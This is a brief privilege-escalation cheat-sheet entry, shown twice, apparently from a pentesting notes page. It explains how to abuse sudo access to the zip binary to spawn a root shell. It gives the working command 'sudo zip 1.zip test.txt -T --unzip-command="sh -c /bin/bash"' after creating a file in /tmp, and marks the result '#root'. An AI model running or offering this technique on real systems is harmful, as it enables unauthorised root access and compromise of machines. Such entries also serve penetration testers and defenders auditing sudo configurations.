/usr/bin/zip
cd /tmp
1)touch a file → touch test.txt
2) sudo zip 1.zip test.txt -T --unzip-command="sh -c /bin/bash"
#root
Last updated
cd /tmp
1)touch a file → touch test.txt
2) sudo zip 1.zip test.txt -T --unzip-command="sh -c /bin/bash"
#root
Last updated